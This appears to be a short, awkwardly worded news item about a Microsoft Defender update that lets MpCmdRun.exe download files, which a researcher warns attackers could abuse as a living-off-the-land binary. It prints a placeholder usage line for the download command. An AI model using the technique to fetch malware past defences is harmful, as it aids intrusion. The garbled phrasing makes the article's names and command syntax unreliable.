Microsoft Protector has once again become the subject of media attention after not enabling it to be removed via the Windows registry. Microsoft recently added a feature to Defender, but security experts said hackers might use that feature to download malicious programs.
In the Microsoft Defender framework version 4.18.2007.9 or 4.18.2009.9, Microsoft has introduced the option to import files from the command line. User form is
MpCmdRun.exe [path to save file] -DownloadFile -url [url] -place
Although there are no loopholes in the function itself, the function runs a running script and can start the command line to import more files from the Internet, using the native living-off-the-land (LOLBIN) file. Adding this function to Windows Defense means there’s one more program to which administrators need to pay attention, and another program that hackers can use.
Askar, a security researcher, said that attackers could exploit certain improvements to command-line tools powered by Microsoft Defender. In other words, hackers can misuse these binary files and download any files, including malware, from the Internet.
This also means that users can use Microsoft Defender to download any file from the Internet itself. This is unlikely to be a major security hole, because after you use the command line tool to complete the download Windows Defender will still check the file.